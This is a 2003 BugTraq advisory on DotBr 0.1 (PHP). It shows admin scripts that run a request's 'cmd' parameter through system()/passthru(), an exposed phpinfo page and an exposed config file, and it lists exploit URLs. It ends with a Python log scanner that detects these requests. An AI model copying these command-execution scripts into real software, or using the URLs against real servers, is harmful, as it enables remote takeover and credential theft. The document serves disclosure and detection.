BugTraq
DotBr (PHP) Feb 15 2003 09:55AM
Frog Man (leseulfrog hotmail com)


Information :
°°°°°°°°°°°°°°
Website : http://dotbr.org
Version : 0.1
Problems :
- phpinfo()
- Information disclosure
- System command execution

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
foo.php3 :
---------------------
<? phpinfo(); ?>
---------------------

config.inc :
- SQL password
- SQL host
- SQL username
- SQL DB name

admin/exec.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
if (!isset($sep)) {
$sep = "_";
}
$cmd=str_replace($sep," ",$cmd);
passthru($cmd,$ret);
echo $ret;
?>
</pre>
</body>
</html>
---------------------------------------

admin/system.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
$cmd = str_replace("_"," ",$cmd);
system($cmd,$result);
echo "\n result == ". $result . "\n";
?>
</pre>
</body>
</html>
---------------------------------------

Exploits :
°°°°°°°°°°
http://[target]/foo.php3
http://[target]/config.inc
http://[target]/admin/exec.php3?cmd=[COMMAND]
http://[target]/admin/system.php3?cmd=[COMMAND]

More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
http://www.phpsecure.org
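
A log check for the four URLs listed under "Exploits", as an added example that is not part of the original advisory or of DotBr: it flags requests for those files and reapplies the scripts' separator substitution to the logged cmd value, so a responder can see which command each request ran. The Common Log Format input, the sample lines and the names scan and rebuild_command are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths named in the advisory, relative to wherever DotBr is installed.
EXPOSED = ("/foo.php3", "/config.inc")
CMD_SCRIPTS = ("/admin/exec.php3", "/admin/system.php3")
# Client, request target and status of a Common Log Format entry (assumed format).
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [15/Feb/2003:10:01:00 +0000] "GET /admin/system.php3?cmd=uname_-a HTTP/1.0" 200 312',
    '192.0.2.10 - - [15/Feb/2003:10:01:05 +0000] "GET /dotbr/admin/exec.php3?sep=.&cmd=ls.-la HTTP/1.0" 200 901',
    '198.51.100.7 - - [15/Feb/2003:10:02:00 +0000] "GET /config.inc HTTP/1.0" 200 148',
    '198.51.100.7 - - [15/Feb/2003:10:02:03 +0000] "GET /foo.php3 HTTP/1.0" 404 209',
    '198.51.100.9 - - [15/Feb/2003:10:03:00 +0000] "GET /index.php3 HTTP/1.0" 200 5120',
]

def rebuild_command(path, query):
    """Reapply the script's str_replace() to the logged query string."""
    params = parse_qs(query, keep_blank_values=True)
    if "cmd" not in params:
        return None
    cmd = params["cmd"][-1]  # PHP keeps the last value of a repeated parameter
    # exec.php3 honours a caller-supplied $sep; system.php3 hard-codes "_".
    sep = params.get("sep", ["_"])[-1] if path.endswith("/admin/exec.php3") else "_"
    # str_replace() with an empty search string leaves the subject unchanged.
    return cmd.replace(sep, " ") if sep else cmd

def scan(lines):
    """Return (client, path, status, finding) for each request to a flagged file."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        if url.path.endswith(CMD_SCRIPTS):
            hits.append((client, url.path, status, rebuild_command(url.path, url.query)))
        elif url.path.endswith(EXPOSED):
            hits.append((client, url.path, status, "file disclosed" if status == 200 else "probe"))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Only the query string is visible in an access log; a cmd value sent in a POST body will show up as a hit with no recovered command.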
